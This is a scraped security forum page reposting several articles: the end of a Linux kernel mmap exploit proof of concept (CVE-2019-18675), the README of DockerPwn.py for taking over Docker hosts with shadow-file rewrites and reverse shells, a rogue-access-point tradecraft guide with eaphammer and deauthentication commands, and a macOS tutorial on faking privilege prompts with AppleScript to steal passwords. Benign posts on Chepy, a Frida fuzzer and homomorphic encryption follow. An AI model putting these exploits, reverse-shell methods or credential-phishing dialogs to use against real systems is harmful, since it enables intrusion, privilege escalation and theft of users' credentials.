printf("[+]Demonstration\n"); pid = getpid(); printf("[~]PID IS %d ", pid); getchar(); int size = 0x11000; unsigned long mapStarter = 0x43434000; unsigned long * mapped = mmap((void *)mapStarter, size, PROT_WRITE | PROT_READ, MAP_SHARED , fd , 0xffffffffffff0000); if(mapped == MAP_FAILED) printf("[-]Error mapping the specified region\n"); else puts("[+]mmap went successfully\n"); /*view the /proc/<pid>/maps file */ sprintf(command , "cat /proc/%d/maps", pid); system(command); return 0; } Compile and run: and B00M! we have got a read and write primitives in kernel space! By modifying struct cred or kernel function pointers/ variables we can possibly gain root! or destroy kernel data! Tips and thoughts Because I didnt have the required hardware (for example, Intel Qx5 microscope ), I’ve made some changes in the driver’s code for this poc . I made some changes to the hardware and usb’s parts, In a way that allowed me to test the mmap functionallity as its in the original driver . Because the vulnerability is not related to the hardware interaction partsl , this wasn’t a problem. This way I could research more and even debug the interesting parts without being depend on hardware. This vulnerability is more than 8 years old! This is my first public vulnerability! Additional info CVE-2019-18675 on NVD CVE-2019-18675 on Mitre Sursa: https://deshal3v.github.io/blog/kernel-research/mmap_exploitation
  17. DockerPwn.py Automation for abusing an exposed Docker TCP Socket. This will automatically create a container on the Docker host with the host's root filesystem mounted, allowing arbitrary read and write of the host filesystem (which is bad). Once created, the script will employ the method of your choosing for obtaining a root shell. All methods are now working properly, and will return a reverse shell. Chroot is the least disruptive, but Useradd is the default. Installation: It is recommended that you utilize the following for usage as opposed to static releases - Code in this repository may be updated frequently with minor improvements before releases are created. git clone https://github.com/AbsoZed/DockerPwn.py && cd DockerPwn.py Methods: All shell I/O is logged to './DockerPwn.log' for all methods. UserPwn: Creates a 'DockerPwn' user, and adds them to /etc/sudoers with NOPASSWD. The handler automatically escalates to root using this privilege, and spawns a PTY. ShadowPwn: Changes root and any valid user passwords to 'DockerPwn' in /etc/shadow, authenticates with Paramiko, and sends a reverse shell. The handler automatically escalates to root utilzing 'su', and spawns a PTY. ChrootPwn: Creates a shell.sh file which is a reverse shell, hosts on port 80. Downloads to /tmp, Utilizes chroot in docker container to execute shell in the context of the host, providing a container shell with interactivity to the host filesystem. Roadmap: SSL Support for :2376 Usage: DockerPwn.py [-h] [--target TARGET] [--port PORT] [--image IMAGE] [--method METHOD] [--c2 C2] optional arguments: -h, --help show this help message and exit --target TARGET IP of Docker Host --port PORT Docker API TCP Port --image IMAGE Docker image to use. Default is Alpine Linux. --method METHOD Method to use. Valid methods are shadowpwn, chrootpwn, userpwn. Default is userpwn. --c2 C2 Local IP and port in [IP]:[PORT] format to receive the shell. Sursa: https://github.com/AbsoZed/DockerPwn.py
  18. Modern Wireless Tradecraft Pt IV — Tradecraft and Defensive Strategy Gabriel Ryan Follow Nov 23 · 9 min read We’ve gone over a lot of information in the last three sections of this writeup. In case you missed them, you can find them here: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee https://posts.specterops.io/modern-wireless-attacks-pt-ii-mana-and-known-beacon-attacks-97a359d385f9 https://posts.specterops.io/modern-wireless-tradecraft-pt-iii-management-frame-access-control-lists-mfacls-22ca7f314a38 Now it’s time to make sense of it all, and talk about how each of the techniques we described fits into our toolkit from an operational perspective. Before we begin, we need to establish some important points from which we’ll build a frame of reference. The first of these is that wireless attacks are inherently risky, since they must be executed within line-of-sight distance to the target. Wireless attacks are a bit like motorcycles: they’re fun, they can be a fast way to get from point A to point B, but they do come with risks that must be managed in order to be used effectively. I’m pretty opinionated about this: I believe that because of the inherent risk, wireless tradecraft needs to be: Pragmatic: Focus should be placed on vetted techniques that are known to work reliably. Attacks should be prepared in advance instead of developed or prepared onsite. Disciplined: Attacks should be executed with deliberation against specific targets to achieve desired outcomes. Attacks should be supervised as they progress. “Spray and pray” tactics such as automatic deauthing should be avoided. Flexible: Techniques should be adjusted in realtime based on observed results. Impact Focused: Focus should be placed on attacks that reliably generate maximum impact in minimum time. Impact Focused Wireless Attacks The last point is particularly important. I do not believe that SSLStripping or Credential Sniffing are practices that belong in modern wireless playbooks for this reason. The widespread adoption of HSTS and Certificate Pinning means that using these techniques is largely a waste of time, and time is a valuable commodity that can lead to detection if not properly managed. With that out of the way, here are some situations in which I think that the use of wireless tradecraft can actually make sense: Breaching Wireless Networks: This is the obvious one. The end goal may be to gain access to an internal corporate network, or it may be something simpler like direct access to surveillance equipment, point-of-sale systems, or other networked hardware. Payload Delivery: APTs will phish under most circumstances, and you should too. However if phishing isn’t your thing or the situation calls for something different, rogue AP attacks can be a startlingly effective platform through which to deliver payloads to WiFi enabled devices. Once you’ve forced a device to connect to you, you gain the ability to act as either a captive portal or an internet gateway. As a captive portal, you can redirect users to pages that prompt them to install implants (aka “updates”), and restrict their Internet access until they comply. When acting as a network gateway, you can inject malicious code into static content (i.e. modify unencrypted JavaScript files in transit, etc). In both cases, you can restrict communication to endpoint protection servers, buying you time to complete the attack. AD Credential Theft: Many organizations tie their wireless infrastructure into Active Directory (AD). If these organizations use weak WPA/2-EAP configurations, the same attacks that you’d use to breach the wireless perimeter can also be effective tools for harvesting AD credentials. Until recently, it was even possible to use HTTP-to-SMB redirection to force Windows devices to surrender AD credentials, although this flaw seems to have been patched in Chrome and Edge within the past year (see: https://github.com/s0lst1c3/eaphammer/wiki/III.-Stealing-AD-Credentials-Using-Hostile-Portal-Attacks). For the sake of simplicity, let’s group these scenarios into the two overarching use-cases: Breaching Wireless Networks Targeting Client Devices In the sections that follow, we’ll example the suitability of each of the techniques we’ve learned for these two specific purposes. Choosing a Rogue AP Technique Evil Twin Attacks Optimal Use-Case: Breaching Wireless Perimeter Evil Twin attacks are the primary means of attacking WPA/2-EAP networks, and can be a also be an effective means of attacking WPA/2-PSK networks. Breaching WPA/2-EAP networks involves using rogue AP attacks to exploit weak EAP configurations. This is a topic for which educational material is already widely available, so I’m not going to cover this in depth in this post. With that said, here’s a quick primer on the subject if you’re interested: http://solstice.sh/workshops/advanced-wireless-attacks/ii-attacking-and-gaining-entry-to-wpa2-eap-wireless-networks/ To attack a WPA/2-PSK network using an evil twin, you create a rogue access point with the same ESSID as the target and configure it to use WPA/2-PSK. You then capture the first two messages of the 4-way WPA handshake from any client that attempts to connect, and crack them to obtain the plaintext password. To perform this attack using EAPHammer, use the --creds flag in conjunction with the —-auth wpa-psk flag: ./eaphammer -i wlan0 -e exampleCorp -c 1 — creds — auth wpa-psk I should point out that this is not a new attack: it’s existed in hostapd-mana since January 2019 and in airbase-ng since dinosaurs roamed the earth. Secondary Use-Case: Targeting Client Devices Evil Twin attacks can be a good choice for targeting specific client devices if you have knowledge of at least one network on the device’s PNL. However, this approach can be dangerous. Evil Twins broadcast beacon frames by default, which prevent us from using MAC-based MFACLs to restrict the attack’s impact to specific devices. If the ESSID of the evil twin is target specific (i.e. you’re attacking EvilCorp and the ESSID of your rogue AP is something specific to EvilCorp’s infrastructure), then you’re probably ok. But if your rogue AP has a fairly common ESSID such as “attwifi”, you stand a high chance of causing collateral damage. Using EAPHammer’s --cloaking full flag can mitigate a lot of this risk, because it will cause your AP to rely exclusively on broadcast probe responses to force targets to connect. ./eaphammer -i wlan0 -e exampleCorp -c 1 — hostile-portal — cloaking full — auth owe However, cloaked evil twin attacks can be stopped using many of the same countermeasures that are used to stop classic karma attacks, so this may not be the best approach. Opsec Considerations Savvy network defenders often whitelist their access points by BSSID. As an attacker, you can circumvent these restrictions by spoofing the BSSID of a whitelisted IP (make sure to choose one that is a considerable distance away to avoid BSS conflicts). You should try to match the capabilities of the target access point though, since failure to do so will make your rogue AP stick out like a sore thumb. MANA (and loud MANA) Attacks Optimal Use-Case: Targeting Client Devices MANA (and all karma-style attacks for that matter) are mainly designed for situations in which you need to target a client device but do not know the device’s PNL. They are also ideal for targeting specific devices, since they can be controlled using MAC-based MFACLs (unlike Evil Twins which rely primarily on beacon frames). Secondary Use-Case: Breaching Wireless Perimeter If the goal of the attack is to steal credentials for a WPA network, an evil twin is generally a better choice. However, it can make sense to use MANA attacks to breach WPA/2-PSK and WPA/2-EAP networks when Wireless Intrusion Prevention Systems (WIPS) are present. MANA attacks can be used to execute a quieter version of the traditional evil twin attack. To do this, begin by creating an ESSID whitelist file containing the ESSID of the target access point: echo exampleCorp > target-ess.txt Next, create a MAC address whitelist file containing the MAC addresses of our targets: echo 00:CB:19:D1:DD:B2 > mac-whitelist.txt echo A3:A5:9A:A9:B3:A4 >> mac-whitelist.txt echo FE:47:F2:7B:69:5C >> mac-whitelist.txt echo C0:AF:A8:23:8D:7E >> mac-whitelist.txt echo 33:58:A1:6E:A4:5F >> mac-whitelist.txt echo C1:62:2A:5D:F8:80 >> mac-whitelist.txt Next, create a rogue AP with the following configuration: cloaking enabled ESSID of target network 802.11w enabled (but not required) to prevent deauths from WIPS MAC-based MFACL to restrict probe responses to specific devices ESSID-based MFACL to restrict probe responses to target network Set auth to either WPA-PSK or WPA-EAP (depending on target network configuration) ./eaphammer -i wlan0 \ --e exampleCorp \ — pmf enable \ — cloaking full \ — mana \ — auth wpa-eap \ — creds \ — mac-whitelist mac-whitelist.txt \ — ssid-whitelist target-ess.txt Optional: deauthenticate client devices to coerce them to roam to new AP: for i in `cat mac-whitelist.txt`; do aireplay-ng -0 5 -a de:ad:be:ef:13:37 -c $i; done The rogue AP will stay “dormant” (not advertise its presence) until it receives probe requests from the target device(s), at which point it will respond in an attempt to trick the targets into associating. Opsec Considerations All karma-style attacks (including MANA) create a an easily detectable one-to-many relationship between a single BSSID and multiple ESSIDs. See the section on detection strategies for more information. Known Beacon Attacks Optimal Use-Case: Targeting Client Devices Known Beacon attacks make sense in situations where you do not know the target devices’ PNL and where MANA attacks fail. Opsec Considerations Known beacon attacks are extremely loud due to the one-to-many relationship they create between a single BSSID and numerous ESSIDs. They also have a high potential for collateral damage. MAC-based MFACLs can limit this collateral damage to some extent — devices will still attempt to connect to your rogue AP, even though they won’t be able to complete the association process. Depending on the rogue AP’s transmission rate and the number of spoofed ESSIDs in use, known beacon attacks can cause network congestion. Detection Strategies Rogue AP detection is a pretty expansive topic, so this won’t be an exhaustive writeup. I do plan on writing at least one dedicated post on this subject in the future though, most likely geared towards Kibana and Wifibeat. With that out of the way, here’s a list of fundamental indicators that any Wireless Intrusion Prevention System (WIPS) should monitor for: 1. New ESSIDs It’s unusual to see new ESSs appear out of nowhere. Although the presence of a new ESS is not an indicator by itself, it does warrant additional investigation. 2. Legacy versions of 802.11 Most modern networking hardware uses 802.11ac, although it’s not uncommon to see 802.11n deployed in production as well. On the other hand, the vast majority of wireless pentesting hardware is limited to 802.11n and earlier. Unless adversaries are particularly aware of what they’re doing, they are likely to use an external wireless interface that is limited to 802.11g or 802.11a. If you suddenly see a new ESS appear and operating in 802.11g/a mode, that’s a pretty good indication that you should take a closer look. 3. Uncommon OUIs The first three octets of any device’s MAC address contains an Organizationally Unique Identifier (OUI) that is used to uniquely identify the device’s manufacturer. Most rogue AP attacks are executed using external hardware made by manufacturers such as Alfa, TP-Link, and Panda Wireless. As such, it’s typically a good idea to monitor for devices that have OUIs that from these types of manufacturers. 4. ESSID Whitelist Violations Keep an inventory of BSSIDs in your network, and use it as a whitelist. If you see an access point that is using your ESSID but is not in your whitelist, that is a strong indication that your network is being attacked. 5. One-to-many relationships A single BSSID should never map to more than one ESSID. The presence of multiple beacon packets or probe response packets for multiple ESSIDs originating from a single BSSID is a strong indicator of malicious activity. 6. Known default settings for rogue AP attack tools Most publicly available tools for performing rogue AP attacks (including the WiFi Pineapple and EAPHammer) have easily identifiable default settings. For example, both EAPHammer and the WiFi Pineapple have a default BSSID of either00:11:22:33:44:00 or 00:11:22:33:44:55. Additionally, EAPHammer has a default ESSID of eaphammer which is still present during karma / MANA attacks unless manually specified by the user. These defaults are basically built-in “skid” filters that were, at least in the case of EAPHammer, deliberately included to make irresponsible use easier to detect. Conclusion This concludes our primer series Modern Wireless Tradecraft. Posts By SpecterOps Team Members Posts from SpecterOps team members on various topics relating information security Written by Gabriel Ryan Follow Researcher and Infosec Journeyman. Red / Blue multiclass battlemage @SpecterOps. I enjoy low-level code and things without wires. Views are my own. #hacking 247 Sursa: https://posts.specterops.io/modern-wireless-tradecraft-pt-iv-tradecraft-and-detection-d1a95da4bb4d
      • 1
      • Like
  19. macOS Red Team: Spoofing Privileged Helpers (and Others) to Gain Root By Phil Stokes - November 25, 2019 As we saw in previous posts, macOS privilege escalation typically occurs by manipulating the user rather than exploiting zero days or unpatched vulnerabilities. Looking at it from from the perspective of a red team engagement, one native tool that can be useful in this regard is AppleScript, which has the ability to quickly and easily produce fake authorization requests that can appear quite convincing to the user. Although this in itself is not a new technique, in this post I will explore some novel ways we can (ab)use the abilities of AppleScript to spoof privileged processes the user already trusts on the local system. What is a Privileged Helper Tool? Most applications on a Mac don’t require elevated privileges to do their work, and indeed, if the application is sourced from Apple’s App Store, they are – at least technically – not allowed to do so. Despite that, there are times when apps have quite legitimate reasons for needing privileges greater than that possessed by the currently logged in user. Here’s a short list, from Apple’s own documentation: manipulating file permissions, ownership creating, reading, updating, or deleting files opening privileged ports for TCP and UDP connections opening raw sockets managing processes reading the contents of virtual memory changing system settings loading kernel extensions Often, programs that need to perform any of these functions only need to do so occasionally, and in that context it makes sense to simply ask the user for authorization at the time. While this may improve security, it is also not the most convenient if the program in question is going to need to perform one or more of these actions more than once in any particular session. Users are not fond of repeated dialog alerts or of repeatedly having to type in a password just to get things done. Privilege separation is a technique that developers can use to solve this problem. By creating a separate “helper program” with limited functionality to carry out these tasks, the user need only be asked at install time for permission to install the helper tool. You’ve likely seen permission requests that look something like this: The helper tool always runs with elevated privileges, but it is coded with limited functionality. At least in theory, the tool can only perform specific tasks and only at behest of the parent program. These privileged helper tools live in a folder in the local domain Library folder: /Library/PrivilegedHelperTools Since they are only installed by 3rd party programs sourced from outside of the App Store, you may or may not have some installed on a given system. However, some very popular and widespread macOS software either does or has made use of such tools. Since orphaned Privileged Helper Tools are not removed by the OS itself, there’s a reasonable chance that you’ll find some of these in use if you’re engaging with an organisation with Mac power users. Here’s a few from my own system that use Privileged Helper Tools: BBEdit Carbon Copy Cloner Pacifist Abuses of this trust mechanism between parent process and privileged helper tool are possible (CVE-2019-13013), but that’s not the route we’re going to take today. Rather, we’re going to exploit the fact that there’s a high chance the user will be familiar with the parent apps of these privileged processes and inherently trust requests for authorization that appear to be coming from them. Why Use AppleScript for Spoofing? Effective social engineering is all about context. Of course, we could just throw a fake user alert at any time, but to make it more effective, we want to : Make it look as authentic as possible – that means, using an alert with convincing text, an appropriate title and preferably a relevant icon Trigger it for a convincing reason – apps that have no business or history of asking for privileges are going to raise more suspicion than those that do. Hence, targeting Privileged Helper tools are a useful candidate, particularly if we provide enough authentic details to pass user scrutiny. Trigger it at an appropriate time, such as when the user is currently using the app that we’re attempting to spoof. All of these tasks are easy to accomplish and combine using AppleScript. Here’s an example of the sort of thing we could create using a bit of AppleScripting. The actual dialog box is fairly crude. We haven’t got two fields for input for both user name and password, for one thing (although as we’ll see in Part 2 that is possible), but even so this dialog box has a lot going for it. It contains a title, an icon and the name of a process that if the user were to look it up online, would lead them back to the Privileged Helper tool that they can verify exists in their own /Library/PrivilegedHelperTools folder. The user would have to dig quite a bit deeper in order to actually discover our fraud. Of course, a suspicious user might just press “Cancel” instead of doing any digging at all. Fortunately, using AppleScript means we can simultaneously make our request look more convincing and discourage our target from doing that again by wiring up the “Cancel” button to code that will either kill the parent app or simply cause an infinite repeat. An infinite repeat might raise too many suspicions, however, but killing the app and throwing a suitable alert “explaining” why this just happened could look far more legitimate. When the user relaunches the parent app and we trigger our authorization request again, the user is now far more likely to throw in the password and get on with their work. For good measure, we can also reject the user’s first attempt to type the password and make them type it twice. Since what is typed isn’t shown back to the user, making typos on password entry is a common experience. Forcing double entry (and capturing the input both times) should ensure that if the first attempt contained a typo or was not correct, the second one should be (we could also attempt to verify the user’s password directly before accepting it, but I shall leave such details aside here as we’ve already got quite a lot of work to get through!). Creating the Spoofing Script If you are unfamiliar with AppleScript or haven’t looked at how it has progressed in recent years since Yosemite 10.10, you might be surprised to learn that you can embed Objective-C code in scripts and call Cocoa and Foundation APIs directly. That means we have all the power of native APIs like NSFileManager, NSWorkspace, NSString, NSArray and many others. In the examples below, I am using a commercial AppleScript editor, but which is also available in a free version and which is far more effective as an AppleScript development environment than the unhelpful built-in Script Editor app. As with any other scripting or programming language, we need to “import” the frameworks that we want to use, which we do in AppleScript with the use keyword. Let’s put the following at the top of our script: These act as both shortcuts and a bridge to the AppleScript-Objective C scripting bridge and make the named APIs accessible in a convenient manner, as we’ll see below. Next, let’s write a couple of “handlers” (functions) to enumerate the PrivilegedHelper tools directory. In the image below, the left side shows the handler we will write; on the right side is an example of what it returns on my machine. As we can see, this handler is just a wrapper for another handler enumerateFolderContents:, which was borrowed from a community forum. Let’s take a look at the code for that, which is a bit more complex: # adapted from a script by Christopher Stone on enumerateFolderContents:aFolderPath set folderItemList to "" as text set nsPath to current application's NSString's stringWithString:aFolderPath --- Expand Tilde & Symlinks (if any exist) --- set nsPath to nsPath's stringByResolvingSymlinksInPath() --- Get the NSURL --- set folderNSURL to current application's |NSURL|'s fileURLWithPath:nsPath set theURLs to (NSFileManager's defaultManager()'s enumeratorAtURL:folderNSURL includingPropertiesForKeys:{} options:((its NSDirectoryEnumerationSkipsPackageDescendants) + (get its NSDirectoryEnumerationSkipsHiddenFiles)) errorHandler:(missing value))'s allObjects() set AppleScript's text item delimiters to linefeed try set folderItemList to ((theURLs's valueForKey:"path") as list) as text end try return folderItemList end enumerateFolderContents: Now that we have our list of Privileged Helper Tools, we will want to grab the file names separately from the path as we will use these names in our message text to boost our credibility. In addition, we want to find the parent app from the Helper tool’s binary both so that we can show this to the user and because we will also need it to find the app’s icon. This is how we do the first task, again with the code on the left and example output shown on the right: Now that we have our targets, all that remains is to find the parent apps. For that, we’ll borrow and adapt from Erik Berglund’s script here. In this example, we can see the parent application’s bundle identifier is “com.barebones.bbedit”. There are a number of ways we can extract the identifier substring from the string, such as using command line utils like awk (as Erik does), or using cut to slice fields, but I’ll stick to Cocoa APIs for both the sake of speed and to avoid unnecessarily spawning more processes. Be aware with whatever technique you use, the identifier does not always occur in the same position and may not begin with “com”. In all cases that I’m aware of, though, it does follow immediately after the keyword “identifier”, so I’m going to use that as my primary delimiter. Do ensure your code accounts for edge cases (I’ll omit error checking here for want of space). In the code above, I use Cocoa APIs to first split the string around either side of the delimiter. That should leave me with the actual bundle identifier at the beginning of the second substring. Note the as text coercion at the end. One hoop we have to jump through when mixing AppleScript and Objective C is converting back and forth between NSStrings and AppleScript text. With the parent application’s bundle identifier to hand, we can find the parent application’s path thanks to NSWorkspace. We’ll also add a loop to do the same for all items in the PrivilegedHelperTools folder. Note how I’ve moved the text conversion away from the bundleID variable because I still need the NSString for the NSWorkspace call that now follows it. The text conversion is delayed until I need the string again in an AppleScript call, which occurs at the end of the repeat method. At this point, we now have the names of each Privileged Helper tool and its path, as well as the bundle identifier and path to each helper tool’s parent app. With this information, we have nearly everything we need for our authorization request. The last remaining step is to grab the application icon from each parent app. Grabbing the Parent Application’s Icon Image Application icons typically live in the application bundle’s Resources folder and have a .icns extension. Since we have the application’s path from above it should be a simple matter to grab the icon. Before we go on, we’ll need to add a couple of “helper handlers” for what’s coming next and to keep our code tidy. Also, at the top of our script, we define some constants. For now, we’ll leave these as plain text, but we can obscure them in various ways in our final version. Notice the defaultIconStr constant, which provides our default. If you want to see what this looks like, try calling it with the following command: -- let's get the user name from Foundation framework: set userName to current application's NSUserName() display dialog hlprName & my makeChanges & return & my privString & userName & my allowThis default answer "" with title parentName default button "OK" with icon my software_update_icon as «class furl» with hidden answer Hmm, not bad, but not great either. It would look so much better with the app’s actual icon. The icon name is defined in the App’s Info.plist. Let’s add another handler to grab it: Here’s our code for grabbing the icon tidied up: And here’s a few examples of what our script produces now: Conclusion Our authorization requests are now looking reasonably convincing. They contain an app name, and a process name, both of which will check out as legitimate if the user decides to look into them. We also have a proper password field and we call the user out by name in the message text. And it’s worth reminding ourselves at this point that all this is achieved without either triggering any traps set in Mojave and Catalina for cracking down on AppleScript, without knowing anything in advance about what is on the victim’s computer and, most importantly, without requiring any privileges at all. Indeed, it’s privileges that we’re after, and in the next part we’ll continue by looking at the code to capture the password entered by the user as well as how to launch our spoofing script at an appropriate time when the user is actually using one of the apps we found on their system. We’ll see how we can adapt the same techniques to target other privileged apps that use kexts and LaunchDaemons rather than Privileged Helper tools. As a bonus, we’ll also look into advanced AppleScript techniques for building even better, more convincing dialog boxes with two text fields. If you enjoyed this post, please subscribe to the blog and we will let you know when the next part is live! Disclaimer To avoid any doubt, all the applications mentioned in this post are perfectly legitimate, and to my knowledge none of the apps contain any vulnerabilities related to the content of this post. The techniques described above are entirely out of control of individual developers. Sursa: https://www.sentinelone.com/blog/macos-red-team-spoofing-privileged-helpers-and-others-to-gain-root/
  20. November 26, 2019 In this paper, I introduce the reader to a heap metadata corruption against the latest version of uClibc. This allocator is used in embedded systems. The unlink attack on heaps was first introduced by Solar Designer in the year 2000 and was the first generic heap exploitation technique made public. In the unlink technique, an attacker corrupts the prev and next pointers of a free chunk. In a subsequent malloc that recycles this chunk, the chunk is unlinked from its freelist via pointer manipulations. This inadvertently allows an attack to craft a write-what-where primitive and write what they want where they want in memory. This attack is historical, but also exists today in uClibc. uClibc Unlink Heap Exploitation.PDF Sursa: https://blog.infosectcbr.com.au/2019/11/uclibc-unlink-heap-exploitation.html
  21. Nytro

    Chepy

    Chepy Chepy is a python library with a handy cli that is aimed to mirror some of the capabilities of CyberChef. A reasonable amount of effort was put behind Chepy to make it compatible to the various functionalities that CyberChef offers, all in a pure Pythonic manner. There are some key advantages and disadvantages that Chepy has over Cyberchef. The Cyberchef concept of stacking different modules is kept alive in Chepy. There is still a long way to go for Chepy as it does not offer every single ability of Cyberchef. Docs Refer to the docs for full usage information Example For all usage and examples, see the docs. Chepy has a stacking mechanism similar to Cyberchef. For example, this in Cyberchef: This is equivalent to from chepy import Chepy file_path = "/tmp/demo/encoding" print( Chepy(file_path) .load_file() .reverse() .rot_13() .base64_decode() .base32_decode() .hexdump_to_str() .o ) Installation Chepy can be installed in a few ways. Pypi pip3 install chepy Git git clone https://github.com/securisec/chepy.git cd chepy pip3 install -e . # I use -e here so that if I update later with git pull, I dont have it install it again (unless dependencies have changed) Pipenv git clone https://github.com/securisec/chepy.git cd chepy pipenv install Docker docker run --rm -ti -v $PWD:/data securisec/chepy "some string" [somefile, "another string"] Chepy vs Cyberchef Advantages Chepy is pure python with a supporting and accessible python api Chepy has a CLI Chepy CLI has full autocompletion. Extendable via plugins Chepy has the concept of recipes which makes sharing much simpler. Infinitely scalable as it can leverage the full Python library. Chepy can interface with the full Cyberchef web app to a certain degree. It is easy to move from Chepy to Cyberchef if need be. The Chepy python library is significantly faster than the Cyberchef Node library. Works with HTTP/S requests without CORS issues. Disadvantages Chepy is not a web app (at least for now). Chepy does not offer every single thing that Cyberchef does Chepy does not have the magic method (at the moment) .. toctree:: :maxdepth: 3 :caption: Contents: usage.md examples.md cli.rst chepy.md core.md modules.rst extras.rst plugins.md pullrequest.md Indices and tables ================== * :ref:`genindex` * :ref:`modindex` * :ref:`search` Sursa: https://github.com/securisec/chepy
  22. Frida/QBDI Android API Fuzzer This experimetal fuzzer is meant to be used for API in-memory fuzzing on Android. The desing is highly inspired and based on AFL/AFL++. ATM the mutator is quite simple, just the AFL's havoc stage and the seed selection is simply FIFO (no favored paths, no trimming, no extra features). Obviously these features are planned, if you want to contribute adding them PR are well accepted. ATM I tested only on the two examples under tests/, this is a very WIP project. How to This fuzzer is known to work in the Android Emulator (tested on x86_64) but should work on any rooted x86 Android device in theory. Firstly, download the Android x86_64 build of QBDI and extract the archive in a subdirectory of this project named QBDI. Then install Frida on your host with pip3 install frida. Make sure to have the root shell and SELinux disabled on your virtual device: host$ adb root host$ adb shell setenforce 0 Download the Android x86_64 frida-server from the repo release page and copy it on the device under /data/local/tmp (use adb push). Copy libQBDI.so always in /data/local/tmp. Start a shell and run the frida-server: device# cd /data/local/tmp device# ./frida-server-12.7.22-android-x86_64 Now install the test app tests/app-debug.apk using the drag & drop into the emulator window. Then, open the app. Compile the agent script wiht frida-compile: host$ frida-compile -x index.js -o frida-fuzz-agent.js Fuzz the test_func function of the libnative-lib.so library shipped with the test app with the command: host$ python3 fuzz.py output_folder/ com.example.ndktest1 Both interesting testcases and crashes are saved into output_folder. Enjoy. Sursa: https://github.com/andreafioraldi/frida-qbdi-fuzzer
  23. Machine Learning on Encrypted Data Without Decrypting It 22 Nov 2019 | Keno Fischer Note: This post discusses cutting edge cryptographic techniques. It is intended to give a view into research at Julia Computing. Do not use any examples in this blog post for production applications. Always consult a professional cryptographer before using cryptography. TL;DR: click here to go directly to the package that implements the magic and here for the code that we’ll be talking about in this blog post. Introduction Suppose you have just developed a spiffy new machine learning model (using Flux.jl of course) and now want to start deploying it for your users. How do you go about doing that? Probably the simplest thing would be to just ship your model to your users and let them run it locally on their data. However there are a number of problems with this approach: ML models are large and the user’s device may not have enough storage or computation to actually run the model. ML models are often updated frequently and you may not want to send the large model across the network that often. Developing ML models takes a lot of time and computational resources, which you may want to recover by charging your users for making use of your model. The solution that usually comes next is expose the model as an API on the cloud. These machine learning-as-a-service offerings have sprung up in mass over the past few years, with every major cloud platform offering such services to the enterprising developer. The dilemma for potential users of such products is obvious: User data is now processed on some remote server that may not necessarily be trustworthy. This has clear ethical and legal ramifications that limit the areas where such solutions can be effective. In regulated industries, such as medicine or finance in particular, sending patient or financial data to third parties for processing is often a no-go. Can we do better? As it turns out we can! Recent breakthroughs in cryptography have made it practical to perform computation on data without ever decrypting it. In our example, the user would send encrypted data (e.g. images) to the cloud API, which would run the machine learning model and then return the encrypted answer. Nowhere was the user data decrypted and in particular the cloud provider does not have access to either the orignal image nor is it able to decrypt the prediction it computed. How is this possible? Let’s find out by building a machine learning service for handwriting recognition of encrypted images (from the MNIST dataset). HE generally The ability to compute on encrypted data is generally referred to as “secure computation” and is a fairly large area of research, with many different cryptographic approaches and techniques for a plethora of different application scenarios. For our example, we will be focusing on a technique known as “homomorphic encryption”. In a homomorphic encryption system, we generally have the following operations available: pub_key, eval_key, priv_key = keygen() encrypted = encrypt(pub_key, plaintext) decrypted = decrypt(priv_key, encrypted) encrypted′ = eval(eval_key, f, encrypted) the first three are fairly straightforward and should be familiar to anyone who has used any sort of asymmetric cryptography before (as you did when you connected to this blog post via TLS). The last operation is where the magic is. It evaluates some function f on the encryption and returns another encrypted value corresponding to the result of evaluting f on the encrypted value. It is this property that gives homomorphic computation its name. Evaluation commutes with the encryption operation: f(decrypt(priv_key, encrypted)) == decrypt(priv_key, eval(eval_key, f, encrypted)) (Equivalently it is possible to evaluate arbitrary homomorphisms f on the encrypted value). Which functions f are supported depends on the cryptographic schemes and depending on the supported operations. If only one f is supported (e.g. f = +), we call an encryption scheme “partially homomorphic”. If f can be any complete set of gates out of which we can build arbitrary circuits, we call the computation “somewhat homomorphic” if the size of the circuit is limited or “fully homomorphic” if the size of the circuit is unlimited. It is often possible to turn “somehwhat” into “fully” homomorphic encryption through a technique known as bootstrapping though that is beyond the scope of the current blog post. Fully homomorphic encryption is a fairly recent discovery, with the first viable (though not practical) scheme published by Craig Gentry in 2009. There are several more recent (and practical) FHE schemes. More importantly, there are software packages that implement them efficiently. The two most commonly used ones are probably Microsoft SEAL and PALISADE. In addition, I recently open sourced a pure julia implementation of these algorithms. For our purposes we will be using the CKKS encryption as implemented in the latter. CKKS High Level CKKS (named after Cheon-Kim-Kim-Song, the authors of the 2016 paper that proposed it) is a homomorphic encryption scheme that allows homomorphic evaluation of the following primitive operations: Elementwise addition of length n vectors of complex numbers Elementwise multiplication of length n complex vectors Rotation (in the circshift sense) of elements in the vector Complex conjugation of vector elements The parameter n here depends on the desired security and precision and is generally relatively high. For our example it will be 4096 (higher numbers are more secure, but also more expensive, scaling as roughly n log n). Additionally, computations using CKKS are noisy. As a result, computational results are only approximate and care must be taken to ensure that results are evaluated with sufficient precision to not affect the correctness of a result. That said, these restrictions are not all that unusual to developers of machine learning packages. Special purpose accelerators like GPUs also generally operate on vectors of numbers. Likewise, for many developers floating point numbers can sometimes feel noisy due to effects of algorithms selection, multithreading etc. (I want to emphasize that there is a crucial difference here in that floating point arithmetic is inherently deterministic, even if it sometimes doesn’t appear that way due to complexity of the implementation, while the CKKS primitives really are noisy, but perhaps this allows users to appreciate that noisyness is not as scary as it might at first appear). With that in mind, let’s see how we can perform these operations in Julia (note: these are highly insecure parameter choices, the purpose of these operations is to illustrate usage of the library at the REPL) julia> using ToyFHE # Let's play with 8 element vectors julia> N = 8; # Choose some parameters - we'll talk about it later julia> ℛ = NegacyclicRing(2N, (40, 40, 40)) ℤ₁₃₂₉₂₂₇₉₉₇₅₆₈₀₈₁₄₅₇₄₀₂₇₀₁₂₀₇₁₀₄₂₄₈₂₅₇/(x¹⁶ + 1) # We'll use CKKS julia> params = CKKSParams(ℛ) CKKS parameters # We need to pick a scaling factor for a numbers - again we'll talk about that later julia> Tscale = FixedRational{2^40} FixedRational{1099511627776,T} where T # Let's start with a plain Vector of zeros julia> plain = CKKSEncoding{Tscale}(zero(ℛ)) 8-element CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7: 0.0 + 0.0im 0.0 + 0.0im 0.0 + 0.0im 0.0 + 0.0im 0.0 + 0.0im 0.0 + 0.0im 0.0 + 0.0im 0.0 + 0.0im # Ok, we're ready to get started, but first we'll need some keys julia> kp = keygen(params) CKKS key pair julia> kp.priv CKKS private key julia> kp.pub CKKS public key # Alright, let's encrypt some things: julia> foreach(i->plain[i] = i+1, 0:7); plain 8-element 